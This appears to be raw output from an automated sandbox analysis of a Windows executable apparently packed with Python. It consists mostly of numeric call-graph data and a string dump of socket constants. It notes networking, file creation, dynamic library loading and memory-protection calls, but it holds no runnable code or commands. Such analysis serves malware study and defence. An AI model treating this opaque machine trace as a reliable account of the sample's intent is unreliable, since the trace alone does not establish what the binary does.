102449 7ff7c2664e6e 102447->102449 102448->102445 102450 7ff7c2669400 2 API calls 102448->102450 102449->102391 102449->102393 102451 7ff7c2664df6 102450->102451 102452 7ff7c2669400 2 API calls 102451->102452 102453 7ff7c2664e0d 102452->102453 102454 7ff7c2669400 2 API calls 102453->102454 102454->102445 102455->102380 102456->102380 102457->102380 102458->102380 102459->102380 102460->102380 102461->102380 102462->102380 102463->102401 102464->102402 102465->102380 102466->102432 102468 7ff7c26645b0 108 API calls 102467->102468 102469 7ff7c2661493 102468->102469 102470 7ff7c26614bc 102469->102470 102471 7ff7c266149b 102469->102471 102473 7ff7c2670744 73 API calls 102470->102473 102520 7ff7c2662710 54 API calls _log10_special 102471->102520 102475 7ff7c26614d1 102473->102475 102474 7ff7c26614ab 102474->102413 102476 7ff7c26614f8 102475->102476 102477 7ff7c26614d5 102475->102477 102481 7ff7c2661508 102476->102481 102482 7ff7c2661532 102476->102482 102521 7ff7c2674f78 11 API calls _get_daylight 102477->102521 102479 7ff7c26614da 102522 7ff7c2662910 54 API calls _log10_special 102479->102522 102523 7ff7c2674f78 11 API calls _get_daylight 102481->102523 102484 7ff7c2661538 102482->102484 102487 7ff7c266154b 102482->102487 102498 7ff7c2661210 102484->102498 102485 7ff7c2661510 102524 7ff7c2662910 54 API calls _log10_special 102485->102524 102490 7ff7c267040c _fread_nolock 53 API calls 102487->102490 102491 7ff7c26614f3 __std_exception_copy 102487->102491 102493 7ff7c26615d6 102487->102493 102489 7ff7c26700bc 74 API calls 102492 7ff7c26615c4 102489->102492 102490->102487 102491->102489 102492->102413 102525 7ff7c2674f78 11 API calls _get_daylight 102493->102525 102495 7ff7c26615db 102526 7ff7c2662910 54 API calls _log10_special 102495->102526 102497->102409 102499 7ff7c2661268 102498->102499 102500 7ff7c2661297 102499->102500 102501 7ff7c266126f 102499->102501 102504 7ff7c26612d4 102500->102504 102505 7ff7c26612b1 102500->102505 102531 7ff7c2662710 54 API calls _log10_special 102501->102531 102503 7ff7c2661282 102503->102491 102508 7ff7c26612e6 102504->102508 102518 7ff7c2661309 memcpy_s 102504->102518 102532 7ff7c2674f78 11 API calls _get_daylight 102505->102532 102507 7ff7c26612b6 102533 7ff7c2662910 54 API calls _log10_special 102507->102533 102534 7ff7c2674f78 11 API calls _get_daylight 102508->102534 102511 7ff7c26612eb 102535 7ff7c2662910 54 API calls _log10_special 102511->102535 102512 7ff7c267040c _fread_nolock 53 API calls 102512->102518 102514 7ff7c26612cf __std_exception_copy 102514->102491 102515 7ff7c26613cf 102536 7ff7c2662710 54 API calls _log10_special 102515->102536 102518->102512 102518->102514 102518->102515 102519 7ff7c2670180 37 API calls 102518->102519 102527 7ff7c2670b4c 102518->102527 102519->102518 102520->102474 102521->102479 102522->102491 102523->102485 102524->102491 102525->102495 102526->102491 102528 7ff7c2670b7c 102527->102528 102537 7ff7c267089c 102528->102537 102530 7ff7c2670b9a 102530->102518 102531->102503 102532->102507 102533->102514 102534->102511 102535->102514 102536->102514 102538 7ff7c26708bc 102537->102538 102543 7ff7c26708e9 102537->102543 102539 7ff7c26708c6 102538->102539 102540 7ff7c26708f1 102538->102540 102538->102543 102551 7ff7c267a884 37 API calls 2 library calls 102539->102551 102544 7ff7c26707dc 102540->102544 102543->102530 102552 7ff7c26754dc EnterCriticalSection 102544->102552 102546 7ff7c26707f9 102547 7ff7c267081c 74 API calls 102546->102547 102548 7ff7c2670802 102547->102548 102549 7ff7c26754e8 _fread_nolock LeaveCriticalSection 102548->102549 102550 7ff7c267080d 102549->102550 102550->102543 102551->102543 102554 7ff7c2674a4e 102553->102554 102555 7ff7c2674a73 102554->102555 102557 7ff7c2674aaf 102554->102557 102571 7ff7c267a884 37 API calls 2 library calls 102555->102571 102572 7ff7c2672c80 49 API calls _invalid_parameter_noinfo 102557->102572 102559 7ff7c2674a9d 102561 7ff7c266c5c0 _log10_special 8 API calls 102559->102561 102560 7ff7c2674b46 102563 7ff7c2674b8c 102560->102563 102565 7ff7c2674b61 102560->102565 102566 7ff7c2674bb0 102560->102566 102569 7ff7c2674b58 102560->102569 102564 7ff7c2661cc8 102561->102564 102575 7ff7c267a9b8 11 API calls 2 library calls 102563->102575 102564->101972 102573 7ff7c267a9b8 11 API calls 2 library calls 102565->102573 102566->102563 102567 7ff7c2674bba 102566->102567 102574 7ff7c267a9b8 11 API calls 2 library calls 102567->102574 102569->102563 102569->102565 102571->102559 102572->102560 102573->102559 102574->102559 102575->102559 102577 7ff7c2675f38 102576->102577 102578 7ff7c2675f5e 102577->102578 102580 7ff7c2675f91 102577->102580 102607 7ff7c2674f78 11 API calls _get_daylight 102578->102607 102583 7ff7c2675f97 102580->102583 102584 7ff7c2675fa4 102580->102584 102581 7ff7c2675f63 102608 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102581->102608 102609 7ff7c2674f78 11 API calls _get_daylight 102583->102609 102595 7ff7c267ac98 102584->102595 102585 7ff7c2664606 102585->102222 102589 7ff7c2675fb8 102610 7ff7c2674f78 11 API calls _get_daylight 102589->102610 102590 7ff7c2675fc5 102602 7ff7c267ff3c 102590->102602 102593 7ff7c2675fd8 102611 7ff7c26754e8 LeaveCriticalSection 102593->102611 102612 7ff7c2680348 EnterCriticalSection 102595->102612 102597 7ff7c267acaf 102598 7ff7c267ad0c 19 API calls 102597->102598 102599 7ff7c267acba 102598->102599 102600 7ff7c26803a8 _isindst LeaveCriticalSection 102599->102600 102601 7ff7c2675fae 102600->102601 102601->102589 102601->102590 102613 7ff7c267fc38 102602->102613 102605 7ff7c267ff96 102605->102593 102607->102581 102608->102585 102609->102585 102610->102585 102617 7ff7c267fc73 __vcrt_FlsAlloc 102613->102617 102615 7ff7c267ff11 102632 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102615->102632 102623 7ff7c267fe3a 102617->102623 102628 7ff7c2677aac 51 API calls 3 library calls 102617->102628 102618 7ff7c267fe43 102618->102605 102625 7ff7c2686dc4 102618->102625 102620 7ff7c267fea5 102620->102623 102629 7ff7c2677aac 51 API calls 3 library calls 102620->102629 102622 7ff7c267fec4 102622->102623 102630 7ff7c2677aac 51 API calls 3 library calls 102622->102630 102623->102618 102631 7ff7c2674f78 11 API calls _get_daylight 102623->102631 102633 7ff7c26863c4 102625->102633 102628->102620 102629->102622 102630->102623 102631->102615 102632->102618 102634 7ff7c26863db 102633->102634 102635 7ff7c26863f9 102633->102635 102687 7ff7c2674f78 11 API calls _get_daylight 102634->102687 102635->102634 102637 7ff7c2686415 102635->102637 102644 7ff7c26869d4 102637->102644 102638 7ff7c26863e0 102688 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102638->102688 102642 7ff7c26863ec 102642->102605 102690 7ff7c2686708 102644->102690 102647 7ff7c2686a49 102722 7ff7c2674f58 11 API calls _get_daylight 102647->102722 102648 7ff7c2686a61 102710 7ff7c2678590 102648->102710 102652 7ff7c2686a4e 102723 7ff7c2674f78 11 API calls _get_daylight 102652->102723 102680 7ff7c2686440 102680->102642 102689 7ff7c2678568 LeaveCriticalSection 102680->102689 102687->102638 102688->102642 102691 7ff7c2686734 102690->102691 102698 7ff7c268674e 102690->102698 102691->102698 102735 7ff7c2674f78 11 API calls _get_daylight 102691->102735 102693 7ff7c2686743 102736 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102693->102736 102695 7ff7c268681d 102706 7ff7c268687a 102695->102706 102741 7ff7c2679be8 37 API calls 2 library calls 102695->102741 102696 7ff7c26867cc 102696->102695 102739 7ff7c2674f78 11 API calls _get_daylight 102696->102739 102698->102696 102737 7ff7c2674f78 11 API calls _get_daylight 102698->102737 102700 7ff7c2686876 102703 7ff7c26868f8 102700->102703 102700->102706 102702 7ff7c2686812 102740 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102702->102740 102742 7ff7c267a970 17 API calls __FrameHandler3::FrameUnwindToEmptyState 102703->102742 102704 7ff7c26867c1 102738 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102704->102738 102706->102647 102706->102648 102743 7ff7c2680348 EnterCriticalSection 102710->102743 102722->102652 102723->102680 102735->102693 102736->102698 102737->102704 102738->102696 102739->102702 102740->102695 102741->102700 102745 7ff7c2677968 102744->102745 102748 7ff7c2677444 102745->102748 102747 7ff7c2677981 102747->102232 102749 7ff7c267748e 102748->102749 102750 7ff7c267745f 102748->102750 102758 7ff7c26754dc EnterCriticalSection 102749->102758 102759 7ff7c267a884 37 API calls 2 library calls 102750->102759 102753 7ff7c267747f 102753->102747 102754 7ff7c2677493 102755 7ff7c26774b0 38 API calls 102754->102755 102756 7ff7c267749f 102755->102756 102757 7ff7c26754e8 _fread_nolock LeaveCriticalSection 102756->102757 102757->102753 102759->102753 102761 7ff7c266feb3 102760->102761 102764 7ff7c266fee1 102760->102764 102771 7ff7c267a884 37 API calls 2 library calls 102761->102771 102763 7ff7c266fed3 102763->102236 102764->102763 102770 7ff7c26754dc EnterCriticalSection 102764->102770 102766 7ff7c266fef8 102767 7ff7c266ff14 72 API calls 102766->102767 102768 7ff7c266ff04 102767->102768 102769 7ff7c26754e8 _fread_nolock LeaveCriticalSection 102768->102769 102769->102763 102771->102763 102772->102253 102774 7ffb0c042250 102778 7ffb0c0422ab new[] 102774->102778 102775 7ffb0c152900 4 API calls 102776 7ffb0c0423e1 102775->102776 102780 7ffb0c0423fd 00007FFB1C263010 102778->102780 102782 7ffb0c042408 new[] 102778->102782 102784 7ffb0c0423c4 102778->102784 102779 7ffb0c042665 102783 7ffb0c0426de 102779->102783 102785 7ffb0c02d9e0 16 API calls 102779->102785 102780->102782 102782->102783 102782->102784 102786 7ffb0c0392b0 102782->102786 102783->102784 102800 7ffb0c038a10 26 API calls 102783->102800 102784->102775 102785->102783 102787 7ffb0c039335 102786->102787 102789 7ffb0c03948d new[] 102786->102789 102788 7ffb0c03934e new[] 102787->102788 102787->102789 102792 7ffb0c039375 00007FFB1C263010 102788->102792 102798 7ffb0c0395c2 102788->102798 102790 7ffb0c039390 new[] 102789->102790 102789->102798 102814 7ffb0c0e5ae0 9 API calls 102789->102814 102791 7ffb0c039455 00007FFB1C263010 102790->102791 102796 7ffb0c039679 102790->102796 102790->102798 102793 7ffb0c03962b 102791->102793 102794 7ffb0c039477 00007FFB1C263010 102791->102794 102792->102790 102795 7ffb0c03962e 00007FFB1C263010 00007FFB1C263010 102793->102795 102794->102795 102795->102796 102796->102798 102801 7ffb0c02ffd0 102796->102801 102798->102779 102800->102784 102808 7ffb0c030021 102801->102808 102803 7ffb0c152900 4 API calls 102804 7ffb0c030647 102803->102804 102804->102798 102805 7ffb0c0301f0 CreateFileW 102805->102808 102808->102805 102809 7ffb0c030475 102808->102809 102811 7ffb0c0303a8 102808->102811 102815 7ffb0c02fa10 15 API calls new[] 102808->102815 102816 7ffb0c030800 13 API calls 102808->102816 102817 7ffb0c029340 9 API calls 102808->102817 102818 7ffb0c02d810 13 API calls 102809->102818 102811->102803 102812 7ffb0c0304a0 102819 7ffb0c0e5ae0 9 API calls 102812->102819 102814->102790 102815->102808 102816->102808 102817->102808 102818->102812 102819->102811 102820 7ffb0c1a8f9e 102821 7ffb0c1a9003 102820->102821 102822 7ffb0c1a8fdd 102820->102822 102822->102821 102824 7ffb0c1a4640 102822->102824 102825 7ffb0c1a468b 102824->102825 102828 7ffb0c1a4a43 102824->102828 102826 7ffb0c1a46dc 00007FFB0C2F805C 102825->102826 102825->102828 102829 7ffb0c1a46f0 102825->102829 102826->102828 102826->102829 102836 7ffb0c1ab510 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 102828->102836 102829->102828 102832 7ffb0c1a4880 00007FFB0C058F60 102829->102832 102834 7ffb0c1a4c29 00007FFB0C058F60 102829->102834 102835 7ffb0c1a5700 00007FFB0C2F805C 102829->102835 102837 7ffb0c1a69bc 00007FFB2ADB6A30 00007FFB2ADB6A30 00007FFB2ADB6A30 00007FFB2ADB6A30 102829->102837 102830 7ffb0c1a4b46 102830->102821 102832->102829 102834->102829 102835->102829 102836->102830 102837->102829 102838 7ffb1ba45338 102839 7ffb1ba4538d 102838->102839 102840 7ffb1ba4534f 102838->102840 102841 7ffb1ba45362 closesocket 102840->102841 102842 7ffb1ba45379 102841->102842 102842->102839 102843 7ffb1ba45382 00007FFB2ADA3440 102842->102843 102843->102839 102844 7ffb0c05fa16 102845 7ffb0c05fa49 102844->102845 102846 7ffb0c05fa34 102844->102846 102867 7ffb0c045d50 102845->102867 102886 7ffb0c066990 19 API calls 102846->102886 102851 7ffb0c05fa40 102854 7ffb0c061f25 102851->102854 102887 7ffb0c029340 9 API calls 102851->102887 102853 7ffb0c06251b 102889 7ffb0c029340 9 API calls 102853->102889 102854->102853 102888 7ffb0c051e20 9 API calls 102854->102888 102857 7ffb0c062566 102858 7ffb0c062577 102857->102858 102890 7ffb0c0554a0 36 API calls 102857->102890 102860 7ffb0c062588 102858->102860 102891 7ffb0c026c40 9 API calls 102858->102891 102863 7ffb0c062034 102860->102863 102892 7ffb0c081280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 102860->102892 102864 7ffb0c152900 4 API calls 102863->102864 102866 7ffb0c062067 102863->102866 102865 7ffb0c062643 102864->102865 102871 7ffb0c045e25 102867->102871 102872 7ffb0c045d77 102867->102872 102868 7ffb0c045e2a 102868->102851 102879 7ffb0c045f40 102868->102879 102870 7ffb0c045efc 102904 7ffb0c029340 9 API calls 102870->102904 102871->102868 102893 7ffb0c041f10 102871->102893 102872->102868 102872->102870 102874 7ffb0c045d7d 102872->102874 102874->102868 102875 7ffb0c045ed3 102874->102875 102876 7ffb0c045ec7 102874->102876 102903 7ffb0c045b40 19 API calls 102875->102903 102902 7ffb0c0e5aa0 9 API calls 102876->102902 102881 7ffb0c045f63 102879->102881 102880 7ffb0c0460b0 102880->102851 102881->102880 102882 7ffb0c0460c8 102881->102882 102883 7ffb0c041f10 19 API calls 102881->102883 102907 7ffb0c029340 9 API calls 102881->102907 102908 7ffb0c029340 9 API calls 102882->102908 102883->102881 102886->102851 102887->102854 102888->102853 102889->102857 102890->102858 102891->102860 102892->102863 102894 7ffb0c041f2d 102893->102894 102895 7ffb0c041f74 102893->102895 102905 7ffb0c029340 9 API calls 102894->102905 102901 7ffb0c03a0d0 19 API calls 102895->102901 102897 7ffb0c041f5e 102897->102872 102898 7ffb0c041f85 102900 7ffb0c041f89 102898->102900 102906 7ffb0c041be0 9 API calls 102898->102906 102900->102872 102901->102898 102902->102868 102903->102868 102904->102868 102905->102897 102906->102900 102907->102881 102908->102880 102918 7ffb1ba46e1c 102919 7ffb1ba46e2f 102918->102919 102920 7ffb1ba46e4c 102919->102920 102922 7ffb1ba446b0 102919->102922 102928 7ffb1ba49548 102922->102928 102924 7ffb1ba446ca ioctlsocket 102925 7ffb1ba44700 102924->102925 102927 7ffb1ba446f6 102924->102927 102926 7ffb1ba44706 WSAGetLastError 102925->102926 102926->102927 102927->102920 102929 7ffb1ba4954f 102928->102929 102930 7ffb1ba4599c 102934 7ffb1ba459d6 102930->102934 102932 7ffb1ba45ad4 102961 7ffb1ba42a00 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 102932->102961 102934->102932 102936 7ffb1ba45afc 102934->102936 102935 7ffb1ba45ae8 102938 7ffb1ba45b46 102936->102938 102937 7ffb1ba45b9b 102941 7ffb1ba45d6e 102937->102941 102949 7ffb1ba45baf 102937->102949 102938->102937 102939 7ffb1ba45e46 102938->102939 102942 7ffb1ba45bb9 102938->102942 102944 7ffb1ba45e75 WSASocketW 102939->102944 102941->102942 102946 7ffb1ba45dc5 getsockname 102941->102946 102962 7ffb1ba42a00 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 102942->102962 102943 7ffb1ba45beb 102943->102932 102945 7ffb1ba45ea2 102944->102945 102951 7ffb1ba45d20 102945->102951 102952 7ffb1ba45d52 102945->102952 102947 7ffb1ba45ddc 102946->102947 102948 7ffb1ba45de8 102946->102948 102947->102952 102953 7ffb1ba45e08 getsockopt 102947->102953 102950 7ffb1ba45df1 WSAGetLastError 102948->102950 102948->102951 102949->102942 102954 7ffb1ba45ce2 WSASocketW 102949->102954 102950->102947 102950->102951 102963 7ffb1ba44a88 WSAGetLastError 102951->102963 102964 7ffb1ba44420 ioctlsocket WSAGetLastError 102952->102964 102953->102951 102953->102952 102957 7ffb1ba45d1a 102954->102957 102957->102951 102959 7ffb1ba45d2a SetHandleInformation 102957->102959 102958 7ffb1ba45d44 closesocket 102958->102942 102959->102952 102960 7ffb1ba45d3c 102959->102960 102960->102942 102960->102958 102961->102935 102962->102943 102963->102942 102964->102960 102965 7ffb1ba46c9c 102968 7ffb1ba46cd2 102965->102968 102966 7ffb1ba46cd6 setsockopt 102971 7ffb1ba46d9f 102966->102971 102968->102966 102969 7ffb1ba46d5e 102968->102969 102970 7ffb1ba46dcb setsockopt 102969->102970 102969->102971 102970->102971 102972 7ffb1ba468dc 102974 7ffb1ba46924 102972->102974 102973 7ffb1ba46928 102974->102973 102975 7ffb1ba45190 12 API calls 102974->102975 102975->102974 102976 7ffb1ab121d0 102977 7ffb1ab12db0 102976->102977 102984 7ffb1ab121e8 102976->102984 102978 7ffb1ab12cd3 LoadLibraryA 102979 7ffb1ab12ced 102978->102979 102980 7ffb1ab12cf6 GetProcAddress 102979->102980 102979->102984 102980->102979 102983 7ffb1ab12d17 102980->102983 102982 7ffb1ab12d22 VirtualProtect VirtualProtect 102982->102977 102984->102978 102984->102982 102985 7ff7c2675698 102986 7ff7c26756b2 102985->102986 102987 7ff7c26756cf 102985->102987 103010 7ff7c2674f58 11 API calls _get_daylight 102986->103010 102987->102986 102989 7ff7c26756e2 CreateFileW 102987->102989 102991 7ff7c267574c 102989->102991 102992 7ff7c2675716 102989->102992 102990 7ff7c26756b7 103011 7ff7c2674f78 11 API calls _get_daylight 102990->103011 103014 7ff7c2675c74 46 API calls 3 library calls 102991->103014 103013 7ff7c26757ec 59 API calls 3 library calls 102992->103013 102996 7ff7c2675751 102999 7ff7c2675755 102996->102999 103000 7ff7c2675780 102996->103000 102997 7ff7c26756bf 103012 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102997->103012 102998 7ff7c2675724 103002 7ff7c267572b CloseHandle 102998->103002 103003 7ff7c2675741 CloseHandle 102998->103003 103015 7ff7c2674eec 11 API calls 2 library calls 102999->103015 103016 7ff7c2675a34 51 API calls 103000->103016 103006 7ff7c26756ca 103002->103006 103003->103006 103007 7ff7c267575f 103007->103006 103008 7ff7c267578d 103017 7ff7c2675b70 21 API calls _fread_nolock 103008->103017 103010->102990 103011->102997 103012->103006 103013->102998 103014->102996 103015->103007 103016->103008 103017->103007 103018 7ffb1ba453a4 103019 7ffb1ba43dd0 14 API calls 103018->103019 103023 7ffb1ba453e4 103019->103023 103020 7ffb1ba4541e 103039 7ffb1ba42a00 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 103020->103039 103022 7ffb1ba4543d 103023->103020 103025 7ffb1ba44484 103023->103025 103026 7ffb1ba49548 103025->103026 103027 7ffb1ba444a8 connect 103026->103027 103028 7ffb1ba444c6 103027->103028 103029 7ffb1ba444ce WSAGetLastError WSAGetLastError 103028->103029 103038 7ffb1ba4450a 103028->103038 103031 7ffb1ba444e7 103029->103031 103030 7ffb1ba444fa 103032 7ffb1ba444ff WSASetLastError 103030->103032 103030->103038 103031->103030 103033 7ffb1ba44522 103031->103033 103031->103038 103032->103038 103034 7ffb1ba4453e 103033->103034 103035 7ffb1ba44557 103033->103035 103037 7ffb1ba45190 12 API calls 103034->103037 103036 7ffb1ba45190 12 API calls 103035->103036 103036->103038 103037->103038 103038->103020 103039->103022 103040 7ff7c2662fe0 103041 7ff7c2662ff0 103040->103041 103042 7ff7c266302b 103041->103042 103043 7ff7c2663041 103041->103043 103068 7ff7c2662710 54 API calls _log10_special 103042->103068 103045 7ff7c2663061 103043->103045 103056 7ff7c2663077 __std_exception_copy 103043->103056 103069 7ff7c2662710 54 API calls _log10_special 103045->103069 103047 7ff7c266c5c0 _log10_special 8 API calls 103049 7ff7c26631fa 103047->103049 103048 7ff7c2663037 __std_exception_copy 103048->103047 103050 7ff7c2661470 116 API calls 103050->103056 103051 7ff7c2663349 103076 7ff7c2662710 54 API calls _log10_special 103051->103076 103052 7ff7c2661c80 49 API calls 103052->103056 103054 7ff7c2663333 103075 7ff7c2662710 54 API calls _log10_special 103054->103075 103056->103048 103056->103050 103056->103051 103056->103052 103056->103054 103057 7ff7c266330d 103056->103057 103059 7ff7c2663207 103056->103059 103074 7ff7c2662710 54 API calls _log10_special 103057->103074 103060 7ff7c2663273 103059->103060 103070 7ff7c267a474 37 API calls 2 library calls 103059->103070 103062 7ff7c266329e 103060->103062 103063 7ff7c2663290 103060->103063 103072 7ff7c2662dd0 37 API calls 103062->103072 103071 7ff7c267a474 37 API calls 2 library calls 103063->103071 103066 7ff7c266329c 103073 7ff7c2662500 54 API calls __std_exception_copy 103066->103073 103068->103048 103069->103048 103070->103060 103071->103066 103072->103066 103073->103048 103074->103048 103075->103048 103076->103048

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 00007FFB1BA410C0 Relevance: 349.6, APIs: 6, Strings: 193, Instructions: 1313networkCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ConditionMask$00007InfoStartupVerifyVersion
                                                                                                                                                                                                                                                                    • String ID: 00000000-0000-0000-0000-000000000000$00:00:00:00:00:00$00:00:00:FF:FF:FF$90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD$A42E7CDA-D03F-480C-9CC2-A4DE20ABB878$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_HYPERV$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$E0E16197-DD56-4A10-9195-5EE7A155A838$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF$HVSOCKET_ADDRESS_FLAG_PASSTHRU$HVSOCKET_CONNECTED_SUSPEND$HVSOCKET_CONNECT_TIMEOUT$HVSOCKET_CONNECT_TIMEOUT_MAX$HV_GUID_BROADCAST$HV_GUID_CHILDREN$HV_GUID_LOOPBACK$HV_GUID_PARENT$HV_GUID_WILDCARD$HV_GUID_ZERO$HV_PROTOCOL_RAW$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_ADD_SOURCE_MEMBERSHIP$IP_BLOCK_SOURCE$IP_DROP_MEMBERSHIP$IP_DROP_SOURCE_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_PKTINFO$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$IP_UNBLOCK_SOURCE$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket.gaierror$socket.herror$timeout
                                                                                                                                                                                                                                                                    • API String ID: 2428397897-1188461360
                                                                                                                                                                                                                                                                    • Opcode ID: f3ee92442da01c5675d5574538c33161c2b68c1f843b35255a2c0a6b2ee3d7ac
                                                                                                                                                                                                                                                                    • Instruction ID: 42e90f81162037b2f6f4411b2fc32ef9e0300506fe2d52dbb5dd2952bc8df6c0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3ee92442da01c5675d5574538c33161c2b68c1f843b35255a2c0a6b2ee3d7ac
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0D2CBA0F38F1349F6188B36E8542651A56FF45BE1F88F239C90E8A674EF6DE119C341
                                                                                                                                                                                                                                                                    Function 00007FF7C2661000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 622 7ff7c2661000-7ff7c2663806 call 7ff7c266fe88 call 7ff7c266fe90 call 7ff7c266c8c0 call 7ff7c2675460 call 7ff7c26754f4 call 7ff7c26636b0 636 7ff7c2663808-7ff7c266380f 622->636 637 7ff7c2663814-7ff7c2663836 call 7ff7c2661950 622->637 638 7ff7c2663c97-7ff7c2663cb2 call 7ff7c266c5c0 636->638 642 7ff7c266383c-7ff7c2663856 call 7ff7c2661c80 637->642 643 7ff7c266391b-7ff7c2663931 call 7ff7c26645b0 637->643 647 7ff7c266385b-7ff7c266389b call 7ff7c2668a20 642->647 650 7ff7c266396a-7ff7c266397f call 7ff7c2662710 643->650 651 7ff7c2663933-7ff7c2663960 call 7ff7c2667f80 643->651 657 7ff7c266389d-7ff7c26638a3 647->657 658 7ff7c26638c1-7ff7c26638cc call 7ff7c2674fa0 647->658 662 7ff7c2663c8f 650->662 660 7ff7c2663984-7ff7c26639a6 call 7ff7c2661c80 651->660 661 7ff7c2663962-7ff7c2663965 call 7ff7c26700bc 651->661 663 